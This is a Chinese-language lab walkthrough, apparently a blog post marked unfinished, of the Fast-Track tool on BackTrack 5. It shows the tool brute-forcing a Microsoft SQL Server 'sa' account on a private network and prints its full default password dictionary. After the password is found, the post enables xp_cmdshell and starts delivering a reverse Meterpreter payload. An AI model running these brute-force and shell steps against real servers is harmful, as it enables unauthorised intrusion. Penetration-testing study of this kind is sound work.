(a)ttempt SQL Ping and Auto Quick Brute Force(未完待续)

在BT5R3上,需要修改文件/pentest/exploits/fasttrack/config/fasttrack_config,改为:

METASPLOIT_PATH=/opt/metasploit/app/

否则会找不到msfcli。

然后进入fasttrack进行操作:

root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i

***********************************************
******* Performing dependency checks... *******
***********************************************

*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***

Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.

Your system has all requirements needed to run Fast-Track!

 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Fast-Track Main Menu:

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Nmap Scripting Engine
    4.  Microsoft SQL Tools
    5.  Mass Client-Side Attack
    6.  Exploits
    7.  Binary to Hex Payload Converter
    8.  Payload Generator
    9.  Fast-Track Tutorials
    10. Fast-Track Changelog
    11. Fast-Track Credits
    12. Exit Fast-Track

    Enter the number: 4

 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Microsoft SQL Attack Tools

    1. MSSQL Injector
    2. MSSQL Bruter
    3. SQLPwnage

    (q)uit

    Enter your choice : 2
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Enter the IP Address and Port Number to Attack.

    Options: (a)ttempt SQL Ping and Auto Quick Brute Force
             (m)ass scan and dictionary brute
             (s)ingle Target (Attack a Single Target with big dictionary)
             (f)ind SQL Ports (SQL Ping)
             (i) want a command prompt and know which system is vulnerable
             (v)ulnerable system, I want to add a local admin on the box...
             (r)aw SQL commands to the SQL Server
             (e)nable xp_cmdshell if its disabled (sql2k and sql2k5)
             (h)ost list file of IP addresses you want to attack
           
             (q)uit
            
    Enter Option: a
Enter username for SQL database (example:sa): sa
Enter the IP Range to scan for SQL Scan (example 192.168.1.1-255): 192.168.1.1/24

Do you want to perform advanced SQL server identification on non-standard SQL ports? This will use UDP footprinting in order to determine where the SQL servers are at. This could take quite a long time.

Do you want to perform advanced identification, yes or no: yes

这样设置好之后,就开始SQL ping了:

[-] Launching SQL Ping, this may take a while to footprint.... [-]

[*] Please wait while we load the module tree...
Brute forcing username: sa

Be patient this could take awhile...

Brute forcing password of password2 on IP 192.168.1.142:1433

Brute forcing password of  on IP 192.168.1.142:1433

Brute forcing password of password on IP 192.168.1.142:1433

Brute forcing password of sqlserver on IP 192.168.1.142:1433

Brute forcing password of sql on IP 192.168.1.142:1433

Brute forcing password of password1 on IP 192.168.1.142:1433

Brute forcing password of password123 on IP 192.168.1.142:1433

Brute forcing password of complexpassword on IP 192.168.1.142:1433

Brute forcing password of database on IP 192.168.1.142:1433

Brute forcing password of server on IP 192.168.1.142:1433

Brute forcing password of changeme on IP 192.168.1.142:1433

Brute forcing password of change on IP 192.168.1.142:1433

Brute forcing password of sqlserver2000 on IP 192.168.1.142:1433

Brute forcing password of sqlserver2005 on IP 192.168.1.142:1433

Brute forcing password of Sqlserver on IP 192.168.1.142:1433

Brute forcing password of SqlServer on IP 192.168.1.142:1433

Brute forcing password of Password1 on IP 192.168.1.142:1433

Brute forcing password of Password2 on IP 192.168.1.142:1433

Brute forcing password of P@ssw0rd on IP 192.168.1.142:1433

Brute forcing password of P@ssw0rd! on IP 192.168.1.142:1433

Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433

Brute forcing password of P@ssword! on IP 192.168.1.142:1433

Brute forcing password of Password! on IP 192.168.1.142:1433

Brute forcing password of password! on IP 192.168.1.142:1433

Brute forcing password of sqlsvr on IP 192.168.1.142:1433

Brute forcing password of sqlaccount on IP 192.168.1.142:1433

Brute forcing password of account on IP 192.168.1.142:1433

Brute forcing password of sasa on IP 192.168.1.142:1433

Brute forcing password of sa on IP 192.168.1.142:1433

Brute forcing password of administator on IP 192.168.1.142:1433

Brute forcing password of pass on IP 192.168.1.142:1433

Brute forcing password of sql on IP 192.168.1.142:1433

Brute forcing password of sqlsql on IP 192.168.1.142:1433

Brute forcing password of microsoft on IP 192.168.1.142:1433

Brute forcing password of sqlserver on IP 192.168.1.142:1433

Brute forcing password of sa on IP 192.168.1.142:1433

Brute forcing password of sasa on IP 192.168.1.142:1433

Brute forcing password of welcome on IP 192.168.1.142:1433

Brute forcing password of sqlpass on IP 192.168.1.142:1433

Brute forcing password of sqlpassword on IP 192.168.1.142:1433

Brute forcing password of guessme on IP 192.168.1.142:1433

Brute forcing password of bird on IP 192.168.1.142:1433

Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433

Brute forcing password of test on IP 192.168.1.142:1433

Brute forcing password of dev on IP 192.168.1.142:1433

Brute forcing password of qa on IP 192.168.1.142:1433

Brute forcing password of god on IP 192.168.1.142:1433

Brute forcing password of sysadmin on IP 192.168.1.142:1433

Brute forcing password of water on IP 192.168.1.142:1433

Brute forcing password of dirt on IP 192.168.1.142:1433

Brute forcing password of air on IP 192.168.1.142:1433

Brute forcing password of earth on IP 192.168.1.142:1433

Brute forcing password of company on IP 192.168.1.142:1433

Brute forcing password of secret on IP 192.168.1.142:1433

Brute forcing password of sqlpass123 on IP 192.168.1.142:1433

Brute forcing password of 123456 on IP 192.168.1.142:1433

Brute forcing password of abcd123 on IP 192.168.1.142:1433

Brute forcing password of abc on IP 192.168.1.142:1433

Brute forcing password of burp on IP 192.168.1.142:1433

Brute forcing password of private on IP 192.168.1.142:1433

Brute forcing password of unknown on IP 192.168.1.142:1433

Brute forcing password of wicked on IP 192.168.1.142:1433

Brute forcing password of alpine on IP 192.168.1.142:1433

Brute forcing password of trust on IP 192.168.1.142:1433

Brute forcing password of microsoft on IP 192.168.1.142:1433

Brute forcing password of sql2000 on IP 192.168.1.142:1433

Brute forcing password of sql2003 on IP 192.168.1.142:1433

Brute forcing password of sql2005 on IP 192.168.1.142:1433

Brute forcing password of sql2008 on IP 192.168.1.142:1433

Brute forcing password of vista on IP 192.168.1.142:1433

Brute forcing password of xp on IP 192.168.1.142:1433

Brute forcing password of nt on IP 192.168.1.142:1433

Brute forcing password of 98 on IP 192.168.1.142:1433

Brute forcing password of 95 on IP 192.168.1.142:1433

Brute forcing password of 2003 on IP 192.168.1.142:1433

Brute forcing password of 2008 on IP 192.168.1.142:1433

Sorry the brute force attack was unsuccessful. Better luck next time!

fasttrack成功得找到了mssql2k的IP:192.168.1.142,但是没猜对密码,接下来我修改一下密码,使得它可以成功。



然后继续sql ping:

Brute forcing username: sa

Be patient this could take awhile...

Brute forcing password of password2 on IP 192.168.1.142:1433

Brute forcing password of  on IP 192.168.1.142:1433

Brute forcing password of password on IP 192.168.1.142:1433

Brute forcing password of sqlserver on IP 192.168.1.142:1433

Brute forcing password of sql on IP 192.168.1.142:1433

Brute forcing password of password1 on IP 192.168.1.142:1433

Brute forcing password of password123 on IP 192.168.1.142:1433

SQL Server Compromised: "sa" with password of: "password123" on IP 192.168.1.142:1433

Brute forcing password of complexpassword on IP 192.168.1.142:1433
Brute forcing password of database on IP 192.168.1.142:1433
Brute forcing password of server on IP 192.168.1.142:1433
Brute forcing password of changeme on IP 192.168.1.142:1433
Brute forcing password of change on IP 192.168.1.142:1433
Brute forcing password of sqlserver2000 on IP 192.168.1.142:1433
Brute forcing password of sqlserver2005 on IP 192.168.1.142:1433
Brute forcing password of Sqlserver on IP 192.168.1.142:1433
Brute forcing password of SqlServer on IP 192.168.1.142:1433
Brute forcing password of Password1 on IP 192.168.1.142:1433
Brute forcing password of Password2 on IP 192.168.1.142:1433
Brute forcing password of P@ssw0rd on IP 192.168.1.142:1433
Brute forcing password of P@ssw0rd! on IP 192.168.1.142:1433
Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433
Brute forcing password of P@ssword! on IP 192.168.1.142:1433
Brute forcing password of Password! on IP 192.168.1.142:1433
Brute forcing password of password! on IP 192.168.1.142:1433
Brute forcing password of sqlsvr on IP 192.168.1.142:1433
Brute forcing password of sqlaccount on IP 192.168.1.142:1433
Brute forcing password of account on IP 192.168.1.142:1433
Brute forcing password of sasa on IP 192.168.1.142:1433
Brute forcing password of sa on IP 192.168.1.142:1433
Brute forcing password of administator on IP 192.168.1.142:1433
Brute forcing password of pass on IP 192.168.1.142:1433
Brute forcing password of sql on IP 192.168.1.142:1433
Brute forcing password of sqlsql on IP 192.168.1.142:1433
Brute forcing password of microsoft on IP 192.168.1.142:1433
Brute forcing password of sqlserver on IP 192.168.1.142:1433
Brute forcing password of sa on IP 192.168.1.142:1433
Brute forcing password of sasa on IP 192.168.1.142:1433
Brute forcing password of welcome on IP 192.168.1.142:1433
Brute forcing password of sqlpass on IP 192.168.1.142:1433
Brute forcing password of sqlpassword on IP 192.168.1.142:1433
Brute forcing password of guessme on IP 192.168.1.142:1433
Brute forcing password of bird on IP 192.168.1.142:1433
Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433
Brute forcing password of test on IP 192.168.1.142:1433
Brute forcing password of dev on IP 192.168.1.142:1433
Brute forcing password of qa on IP 192.168.1.142:1433
Brute forcing password of god on IP 192.168.1.142:1433
Brute forcing password of sysadmin on IP 192.168.1.142:1433
Brute forcing password of water on IP 192.168.1.142:1433
Brute forcing password of dirt on IP 192.168.1.142:1433
Brute forcing password of air on IP 192.168.1.142:1433
Brute forcing password of earth on IP 192.168.1.142:1433
Brute forcing password of company on IP 192.168.1.142:1433
Brute forcing password of secret on IP 192.168.1.142:1433
Brute forcing password of sqlpass123 on IP 192.168.1.142:1433
Brute forcing password of 123456 on IP 192.168.1.142:1433
Brute forcing password of abcd123 on IP 192.168.1.142:1433
Brute forcing password of abc on IP 192.168.1.142:1433
Brute forcing password of burp on IP 192.168.1.142:1433
Brute forcing password of private on IP 192.168.1.142:1433
Brute forcing password of unknown on IP 192.168.1.142:1433
Brute forcing password of wicked on IP 192.168.1.142:1433
Brute forcing password of alpine on IP 192.168.1.142:1433
Brute forcing password of trust on IP 192.168.1.142:1433
Brute forcing password of microsoft on IP 192.168.1.142:1433
Brute forcing password of sql2000 on IP 192.168.1.142:1433
Brute forcing password of sql2003 on IP 192.168.1.142:1433
Brute forcing password of sql2005 on IP 192.168.1.142:1433
Brute forcing password of sql2008 on IP 192.168.1.142:1433
Brute forcing password of vista on IP 192.168.1.142:1433
Brute forcing password of xp on IP 192.168.1.142:1433
Brute forcing password of nt on IP 192.168.1.142:1433
Brute forcing password of 98 on IP 192.168.1.142:1433
Brute forcing password of 95 on IP 192.168.1.142:1433
Brute forcing password of 2003 on IP 192.168.1.142:1433
Brute forcing password of 2008 on IP 192.168.1.142:1433

*******************************************
The following SQL Servers were compromised:
*******************************************

1. 192.168.1.142:1433 *** U/N: sa P/W: password123 ***

*******************************************

To interact with system, enter the SQL Server number. 

Example: 1. 192.168.1.32 you would type 1

Enter the number: 1
Specify payload:

1. Standard Command Prompt
2. Metasploit Reverse VNC TCP (Requires Metasploit) 
3. Metasploit Meterpreter (Requires Metasploit)
4. Metasploit Reflective VNC DLL Injection (Requires Metasploit)
     
Enter number here: 3

Enabling: XP_Cmdshell...
Finished trying to re-enable xp_cmdshell stored procedure if disabled.

What port do you want the payload to connect to you on: 4444
Metasploit Reverse Meterpreter Upload Detected..
Launching Meterpreter Handler.
Creating Metasploit Reverse Meterpreter Payload..

这样,就发现了密码password123。但是接下来,并没有成功:

Sending payload: 6200
Metasploit payload delivered..
Converting our payload to binary, this may take a few...
Cleaning up...
Launching payload, this could take up to a minute...
When finished, close the metasploit handler window to return to other compromised SQL Servers.
Press enter to return back to compromised SQL Servers.

还要看看代码,调试一下,明天再搞。

你可能感兴趣的:((a)ttempt SQL Ping and Auto Quick Brute Force(未完待续))